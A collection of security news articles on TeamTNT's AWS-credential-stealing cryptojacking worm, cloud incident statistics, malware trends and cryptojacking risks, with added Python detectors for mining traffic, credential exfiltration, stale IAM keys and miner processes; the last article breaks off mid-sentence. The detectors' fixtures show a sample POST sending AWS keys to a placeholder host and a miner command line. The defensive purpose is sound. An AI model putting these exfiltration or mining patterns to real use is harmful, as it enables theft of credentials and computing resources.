Updated cryptojacking worm steals AWS credentials

A malicious cryptocurrency miner and DDoS worm that has been targeting Docker systems for months now also steals Amazon Web Services (AWS) credentials.

What’s more, TeamTNT – the attackers wielding it – have also begun targeting Kubernetes clusters and Jenkins servers.

The original threat

TeamTNT’s “calling card” appears when the worm first runs on the target installation:

[Image: TeamTNT's "calling card" banner]

First spotted by MalwareHunterTeam and Trend Micro researchers in May 2020, the original worm would:

  • Scan for open Docker daemon ports (i.e., misconfigured Docker containers)
  • Create an Alpine Linux container to host the coinminer and DDoS bot
  • Search for and delete other coin miners and malware
  • Configure the firewall to allow ports that will be used by the other components, sinkhole other domain names, exfiltrate sensitive information from the host machine
  • Download additional utilities, a log cleaner, and a tool that attackers may use to pivot to other devices in the network (via SSH)
  • Download and install the coinminer
  • Collect system information and send it to the C&C server

New capabilities

The latest iteration has been equipped with new capabilities, Cado Security researchers found.

The worm still scans for open Docker APIs, then spins up Docker images and installs itself in a new container, but it now also searches for exploitable Kubernetes systems and for files containing AWS credentials and configuration details – in case the compromised systems run on AWS infrastructure.

The code to steal these files is relatively straightforward, the researchers note, and they expect other worms to copy this new ability soon.

But are the attackers using the stolen credentials or are they selling them? The researchers tried to find out by sending “canary” AWS keys to TeamTNT’s servers, but they haven’t been used yet.

“This indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn’t currently functioning,” they concluded.

Nevertheless, they urge businesses to:

  • Identify systems that are storing AWS credential files and delete them if they aren’t needed
  • Use firewall rules to limit any access to Docker APIs
  • Review network traffic for connections to mining pools or using the Stratum mining protocol
  • Review any connections sending the AWS Credentials file over HTTP
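The last two recommendations can be turned directly into detection logic. The following is an added example, not code from Cado Security or from the original article, that runs two detectors over captured TCP payloads: one for Stratum mining-pool JSON-RPC messages (the method names are those used by common pool implementations) and one for an AWS shared credentials file leaving a host in a plaintext HTTP request body. The flows and addresses are constructed, and the key pair is the example pair from AWS's own documentation.

```python
"""Flag Stratum mining traffic and AWS credential files sent over plaintext HTTP
in captured TCP payloads.  Added example; the flows below are constructed."""
import json
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Stratum is JSON-RPC over a raw TCP socket, one object per line.  These are the
# method names used by Bitcoin-style pools and by the Monero-style login variant.
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit", "mining.notify",
    "mining.set_difficulty", "login", "submit", "keepalived",
}

# The two lines that make up a profile in an AWS shared credentials file.
# The key id is AKIA/ASIA plus 16 uppercase alphanumerics; the secret is 40 base64 chars.
AWS_KEY_ID_RE = re.compile(r"aws_access_key_id\s*=\s*(?:AKIA|ASIA)[0-9A-Z]{16}")
AWS_SECRET_RE = re.compile(r"aws_secret_access_key\s*=\s*[A-Za-z0-9/+=]{40}")


@dataclass
class Finding:
    src: str
    dst: str
    kind: str    # "stratum" or "aws-credentials-over-http"
    detail: str


def stratum_method(payload: bytes) -> Optional[str]:
    """Return the Stratum method name if the payload carries a Stratum JSON-RPC message."""
    for line in payload.splitlines():
        line = line.strip()
        if not line.startswith(b"{"):
            continue
        try:
            msg = json.loads(line)
        except ValueError:
            continue
        if isinstance(msg, dict) and msg.get("method") in STRATUM_METHODS:
            return msg["method"]
    return None


def aws_credentials_in_http(payload: bytes) -> bool:
    """True when a plaintext HTTP request body contains a complete AWS credentials profile."""
    if not payload.startswith((b"POST ", b"PUT ")):
        return False
    _headers, _, body = payload.partition(b"\r\n\r\n")
    text = body.decode("utf-8", "replace")
    return bool(AWS_KEY_ID_RE.search(text) and AWS_SECRET_RE.search(text))


def scan_flows(flows: List[Tuple[str, str, bytes]]) -> List[Finding]:
    """Run both detectors over (src, dst, payload) tuples."""
    findings = []
    for src, dst, payload in flows:
        method = stratum_method(payload)
        if method:
            findings.append(Finding(src, dst, "stratum", method))
        if aws_credentials_in_http(payload):
            findings.append(Finding(src, dst, "aws-credentials-over-http",
                                    "credentials profile in request body"))
    return findings


# Constructed sample flows: (source, destination, first bytes of the TCP payload).
# The access key pair is the example pair from AWS's own documentation.
SAMPLE_FLOWS = [
    ("10.0.0.5:41022", "198.51.100.7:3333",
     b'{"id":1,"method":"login","params":{"login":"WALLET","pass":"x","agent":"miner/1.0"}}\n'),
    ("10.0.0.5:41023", "198.51.100.8:80",
     b"POST /upload HTTP/1.1\r\nHost: 198.51.100.8\r\nContent-Type: text/plain\r\n\r\n"
     b"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
     b"aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"),
    # An ordinary TLS ClientHello and a plain GET, both benign.
    ("10.0.0.9:51000", "203.0.113.2:443", b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),
    ("10.0.0.9:51001", "203.0.113.3:80", b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"),
]

if __name__ == "__main__":
    for f in scan_flows(SAMPLE_FLOWS):
        print(f"{f.kind:26} {f.src} -> {f.dst}  ({f.detail})")
```

Detection keys on the payload rather than the port, because pools listen on many ports and the worm picks the destination; the same two detectors can be fed from a packet capture or an IDS payload log.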

70% of organizations experienced a public cloud security incident in the last year

70% of organizations experienced a public cloud security incident in the last year – including ransomware and other malware (50%), exposed data (29%), compromised accounts (25%), and cryptojacking (17%), according to Sophos.


Organizations running multi-cloud environments are greater than 50% more likely to suffer a cloud security incident than those running a single cloud.

Europeans suffered the lowest percentage of security incidents in the cloud, an indicator that compliance with GDPR guidelines is helping to protect organizations from being compromised. India, on the other hand, fared the worst, with 93% of organizations being hit by an attack in the last year.

“Ransomware, not surprisingly, is one of the most widely reported cybercrimes in the public cloud. The most successful ransomware attacks include data in the public cloud, according to the State of Ransomware 2020 report, and attackers are shifting their methods to target cloud environments that cripple necessary infrastructure and increase the likelihood of payment,” said Chester Wisniewski, principal research scientist, Sophos.

“The recent increase in remote working provides extra motivation to disable cloud infrastructure that is being relied on more than ever, so it’s worrisome that many organizations still don’t understand their responsibility in securing cloud data and workloads. Cloud security is a shared responsibility, and organizations need to carefully manage and monitor cloud environments in order to stay one step ahead of determined attackers.”

The unintentional open door: How attackers break in

Accidental exposure continues to plague organizations, with misconfigurations exploited in 66% of reported attacks. Misconfigurations drive the majority of incidents and are all too common given cloud management complexities.

Additionally, 33% of organizations report that cybercriminals gained access through stolen cloud provider account credentials. Despite this, only a quarter of organizations say managing access to cloud accounts is a top area of concern.

Data further reveals that 91% of accounts have overprivileged identity and access management roles, and 98% have multi-factor authentication disabled on their cloud provider accounts.
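Both figures are things an account owner can measure directly. As an added example (not from Sophos or the survey), the script below triages an IAM credential report, the CSV that `aws iam generate-credential-report` followed by `aws iam get-credential-report` produces, for console users without MFA and for active access keys that are stale or unrotated. Privilege breadth itself needs policy data the report does not carry. The report rows are constructed, the account id 111122223333 is a placeholder, and the fixed "now" keeps the output reproducible.

```python
"""Triage an IAM credential report for console users without MFA and for stale or
unrotated access keys.  Added example; the report below is constructed."""
import csv
import io
from datetime import datetime, timedelta, timezone
from typing import List, Optional, Tuple

# The columns used below exist in the real credential report; the rows are constructed.
SAMPLE_REPORT = """\
user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_1_last_used_region,access_key_1_last_used_service,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date,access_key_2_last_used_region,access_key_2_last_used_service
<root_account>,arn:aws:iam::111122223333:root,2019-01-10T12:00:00+00:00,not_supported,2020-08-01T09:00:00+00:00,not_supported,not_supported,false,false,N/A,N/A,N/A,N/A,false,N/A,N/A,N/A,N/A
alice,arn:aws:iam::111122223333:user/alice,2019-03-02T10:00:00+00:00,true,2020-08-10T08:00:00+00:00,2020-02-01T08:00:00+00:00,N/A,true,true,2020-06-01T00:00:00+00:00,2020-08-11T00:00:00+00:00,us-east-1,s3,false,N/A,N/A,N/A,N/A
bob,arn:aws:iam::111122223333:user/bob,2019-05-20T10:00:00+00:00,true,2020-07-30T08:00:00+00:00,2019-05-20T10:00:00+00:00,N/A,false,true,2019-05-20T10:00:00+00:00,2019-11-02T00:00:00+00:00,eu-west-1,ec2,false,N/A,N/A,N/A,N/A
ci-deploy,arn:aws:iam::111122223333:user/ci-deploy,2019-06-01T10:00:00+00:00,false,N/A,N/A,N/A,false,true,2020-07-15T00:00:00+00:00,2020-08-12T00:00:00+00:00,us-east-1,ecr,false,N/A,N/A,N/A,N/A
"""

NOW = datetime(2020, 8, 15, tzinfo=timezone.utc)   # fixed "today" so results are reproducible
STALE_AFTER = timedelta(days=90)


def _ts(value: str) -> Optional[datetime]:
    """Parse a report timestamp; the report's N/A-style markers yield None."""
    if value in ("N/A", "no_information", "not_supported", ""):
        return None
    return datetime.fromisoformat(value)


def triage(report_csv: str, now: datetime = NOW) -> List[Tuple[str, str]]:
    """Return (user, finding) pairs in report order."""
    findings = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        user = row["user"]
        # The root row reports password_enabled as not_supported; root always has a console password.
        console = row["password_enabled"] in ("true", "not_supported")
        if console and row["mfa_active"] != "true":
            findings.append((user, "console login without MFA"))
        for n in ("1", "2"):
            if row[f"access_key_{n}_active"] != "true":
                continue
            last_used = _ts(row[f"access_key_{n}_last_used_date"])
            rotated = _ts(row[f"access_key_{n}_last_rotated"])
            if last_used is None or now - last_used > STALE_AFTER:
                findings.append((user, f"access key {n} unused for more than {STALE_AFTER.days} days"))
            if rotated is not None and now - rotated > STALE_AFTER:
                findings.append((user, f"access key {n} not rotated for more than {STALE_AFTER.days} days"))
    return findings


if __name__ == "__main__":
    for user, finding in triage(SAMPLE_REPORT):
        print(f"{user:16} {finding}")
```

Run against a real report, the output is the list of accounts to chase first: every console identity without MFA is a stolen-password incident waiting to happen, and a key that has been neither used nor rotated in months is pure attack surface with no business use to justify it.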


Public cloud security incident: The silver lining

96% of respondents admit to concern about their current level of cloud security, an encouraging sign that it’s top of mind and important.

Appropriately, “data leaks” top the list of security concerns for nearly half of respondents (44%); identifying and responding to security incidents is a close second (41%). Notwithstanding this silver lining, only one in four respondents view lack of staff expertise as a top concern.

Malware and ransomware attack volume down due to more targeted attacks

Cybercriminals are leveraging more evasive methods to target businesses and consumers, a SonicWall report reveals.


“Cybercriminals are honing their ability to design, author and deploy stealth-like attacks with increasing precision, while growing their capabilities to evade detection by sandbox technology,” said SonicWall President and CEO Bill Conner.

“Now more than ever, it’s imperative that organizations detect and respond quickly, or run the risk of having to negotiate what’s being held at ransom from criminals so emboldened they’re now negotiating the terms.”

The 2020 SonicWall Cyber Threat Report is the result of threat intelligence collected over the course of 2019 by over 1.1 million sensors placed in over 215 countries and territories.

Cybercriminals change approach to malware

Spray-and-pray tactics that once had malware attack numbers soaring have since been abandoned for more targeted and evasive methods aimed at weaker victims. SonicWall recorded 9.9 billion malware attacks, a slight 6% year-over-year decrease.

Targeted ransomware attacks cripple victims

While total ransomware volume (187.9 million) dipped 9% for the year, highly targeted attacks left many state, provincial and local governments paralyzed and took down email communications, websites, telephone lines and even dispatch services.

The IoT is a treasure trove for cybercriminals

Bad actors continue to deploy ransomware on ordinary devices, such as smart TVs, electric scooters and smart speakers, to daily necessities like toothbrushes, refrigerators and doorbells.

Researchers discovered a moderate 5% increase in IoT malware, with a total volume of 34.3 million attacks in 2019.

Cryptojacking continues to crumble

The volatile shifts and swings of the cryptocurrency market had a direct impact on threat actors’ interest to author cryptojacking malware. The dissolution of Coinhive in March 2019 played a major role in the threat vector’s decline, plunging the volume of cryptojacking hits to 78% in the second half of the year.

Fileless malware targets Microsoft Office/Office 365, PDF documents

Cybercriminals used new code obfuscation, sandbox detection and bypass techniques, resulting in a multitude of variants and the development of newer and more sophisticated exploit kits using fileless attacks instead of traditional payloads to a disk.

While malware decreased 6% globally, most new threats masked their exploits within today’s most trusted files. In fact, Office (20.3%) and PDFs (17.4%) represent 38% of new threats detected by Capture ATP.

Encrypted threats are still everywhere

Cybercriminals have become reliant upon encrypted threats that evade traditional security control standards, such as firewall appliances that do not have the capability or processing power to detect, inspect and mitigate attacks sent via HTTPS traffic.

Researchers recorded 3.7 million malware attacks sent over TLS/SSL traffic, a 27% year-over-year increase that is trending up and expected to climb through the year.


Side-channel attacks are evolving

The recent introduction of TPM-FAIL, the next variation of Meltdown/Spectre, Foreshadow, PortSmash, MDS and more, signals criminals’ intent to weaponize this method of attack.

These vulnerabilities could impact unpatched devices in the future, including everything from security appliances to end-user laptops. Threat actors could potentially issue digital signatures to bypass authentication or digitally sign malicious software.

Attacks over non-standard ports cannot be ignored

This year’s research indicated that more than 19% of malware attacks leveraged non-standard ports, but found the volume dropping to 15% by year’s end with a total of 64 million detected threats. This type of tactic is utilized to deliver payloads undetected against targeted businesses.

“The application layer is the biggest target right now. The average commercial web application, like the one that we all use for our shopping or banking, has 26.7 vulnerabilities. That’s a shocking number. Imagine if your airline averaged 26.7 safety problems! Fortunately, it is now possible to give software a sort of digital immune system. Web applications and APIs can be provided with defences that enable them to identify their own vulnerabilities and prevent them from being exploited. Once teams see exactly where they are weak and how attackers are targeting them, they can quickly clean up their house, ensuring that they (and those using their software) are protected,” Jeff Williams, at Contrast Security, told Help Net Security.

The hidden risks of cryptojacking attacks

For any business, privacy and security are a constant concern. The variety and velocity of attacks seeking to infiltrate corporate systems and steal vital business and customer information seem never-ending. Given the very public repercussions of certain types of breaches, it can be easy for executives and IT professionals to focus attention on only the most notable attacks. However, numerous industry studies have found that a quiet threat, known as cryptojacking, is rising faster than any other type of cyber incident.

Cryptojacking is a breach where malware is installed on a device connected to the internet (anything from a phone, to a gaming console, to an organization’s servers). Once installed, the malware uses the hijacked computing power to “mine” cryptocurrency without the user’s knowledge.

Unlike phishing or ransomware attacks, cryptojacking runs nearly silently in the background of the victim’s device, and as a result the increase in cryptojacking attacks has flown mainly under the radar. Yet, new studies suggest that attacks of this type have more than tripled since 2017, generating concern as these undetected breaches siphon energy, slow down performance of systems and expose victims to additional risk.

The rise of cryptojacking has followed the same upward trajectory as the value of cryptocurrency. Suddenly, digital “cash” is worth actual money and hackers, who usually have to take several steps to generate income from stolen data, have a direct path to cashing in on their exploits. But if all the malware does is sit quietly in the background generating cryptocurrency, is it really much of a danger? In short, yes – for two reasons.

In fundamental terms, cryptojacking attacks are about stealing… in this case energy and system resources. The energy might be minimal (more about that in a moment) but using resources slows the performance of the overall system and actually increases wear and tear on the hardware, reducing its lifespan, resulting in frustration, inefficiency and increased costs.

Much more importantly however, a cryptojacking-compromised system is a flashing warning sign that a vulnerability exists. Often, infiltrating a system to cryptojack involves opening access points that can be easily leveraged to steal other types of data. Cryptojacking not only appropriates valuable computer and energy resources, but also exposes victims to much more blatant and damaging data attacks.

Who is at risk?

Any connected device can be utilized to mine cryptocurrency. However, the goal of most cryptojacking operations is to hijack enough devices that their processing power can be pooled, creating a much more effective network with which to generate income. This strategy relies on drawing small amounts of power from many different machines, which also lessens the chance that a victim realizes they have been hacked, because the power stolen from each is minuscule enough to be ignored.

Once hacked, the attacker will network these devices together to create large cryptojacking networks. These attacks are thus often focused on large corporations or businesses where access to multiple devices is easy and convenient.

Identifying victims

Identifying and flagging cryptojacked devices can be difficult, requiring dedicated time and energy. In many cases, the malware might reside in compromised versions of legitimate software. As a result, security scans are less likely to flag the downloaded application as a threat.

The first clue that something may be amiss at the organization is the sudden slowing of devices or a rise in cross-company complaints about computer performance. If widespread, administrators should look to potential cryptojacking as the possible culprit.
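One way to act on that clue on a Linux host, as an added example that is not from the article: rank a `ps` listing by sustained CPU use and corroborate with two generic heuristics (an executable run from a world-writable temporary directory, and mining-pool style command-line arguments). The listing is constructed, and the heuristics are illustrative rather than indicators tied to any particular campaign.

```python
"""Rank a Linux process listing by sustained CPU use and corroborate with generic
miner heuristics.  Added example; the listing and heuristics are the author's own."""
import re
from typing import List, Tuple

# Constructed output of:  ps -eo pid,pcpu,etimes,user,args --no-headers
SAMPLE_PS = """\
  812  0.3  86400 root     /usr/sbin/sshd -D
 1044  1.2  86100 www-data /usr/sbin/nginx -g daemon off;
 2231 97.8  43200 www-data /dev/shm/.s/sysupdate -o stratum+tcp://pool.example.invalid:3333 -u WALLET -p x
 2399 96.5  39600 postgres /usr/lib/postgresql/12/bin/postgres -D /var/lib/postgresql/12/main
 3110 88.0    120 alice    /usr/bin/ffmpeg -i in.mp4 out.webm
"""

CPU_THRESHOLD = 80.0       # percent of one core
SUSTAINED_SECONDS = 3600   # high CPU for longer than this is "sustained", not a burst
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
MINER_HINTS = re.compile(r"stratum\+(?:tcp|ssl)://|--donate-level|--algo\b|-a\s+(?:cryptonight|rx/\d)")


def triage_ps(ps_text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (pid, args, reasons) for every process with at least one signal, strongest first."""
    flagged = []
    for line in ps_text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, pcpu, etimes, _user, args = int(parts[0]), float(parts[1]), int(parts[2]), parts[3], parts[4]
        reasons = []
        if pcpu >= CPU_THRESHOLD and etimes >= SUSTAINED_SECONDS:
            reasons.append(f"{pcpu:.1f}% CPU sustained for {etimes // 3600}h")
        exe = args.split()[0]
        if exe.startswith(SUSPECT_DIRS):
            reasons.append(f"executable lives in {exe.rsplit('/', 1)[0]}/")
        if MINER_HINTS.search(args):
            reasons.append("mining-pool style arguments")
        if reasons:
            flagged.append((pid, args, reasons))
    # Sustained CPU on its own (a busy database) is routine; the more signals agree,
    # the higher the process sorts, so corroborated entries come first.
    flagged.sort(key=lambda item: len(item[2]), reverse=True)
    return flagged


if __name__ == "__main__":
    for pid, args, reasons in triage_ps(SAMPLE_PS):
        print(f"PID {pid}: {'; '.join(reasons)}\n    {args}")
```

The short-lived `ffmpeg` burst is ignored and the long-running database shows up with a single, explainable reason, while the process that combines sustained load, a temp-directory binary and pool arguments sorts to the top; a real deployment would feed this from periodic `ps` snapshots so that a miner which idles when an administrator logs in is still caught.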

Protecting the pack

Organizations and individuals looking to protect themselves need to ensure their overall privacy and security posture is high and that they are taking every step to defend themselves against all types of cyber incidents. Cryptojacking is often a warning shot, sending up a red flag that the system may not be as protected as it should be.

Relying on the basics is the first place to start – everyone on the network should be using multi-factor authentication and unique passwords. There should be continuous monitoring for unexpected activity on the network, as well as safeguards in place to make sure any software installed on a device comes from a reputable source and is fully patched. Finally, there needs to be a team dedicated to constantly monitoring, remediating and updating privacy and security safeguards.

While cryptojacking attacks are worrisome and can lead to further breaches, with proper monitoring and early detection most can be avoided or remedied before a larger incident occurs. The rise in cryptojacking should be taken as a good reminder for administrators to ensure their security and privacy measures adhere to current standards.

After all, if there weren’t a lot of vulnerable systems out there this type of attack wouldn’t be growing at a rapid pace. As always, staying vigilant, up-to-date and following security best practices is the only way to stay shielded against cryptojacking cybercriminals.

Attack tools and techniques used by major ransomware families

Ransomware tries to slip unnoticed past security controls by abusing trusted and legitimate processes, and then harnesses internal systems to encrypt the maximum number of files and disable backup and recovery processes before an IT security team catches up, according to a new Sophos report.

Main modes of distribution for the major ransomware families

Ransomware is typically distributed in one of three ways: as a cryptoworm, which replicates itself rapidly to other computers for maximum …
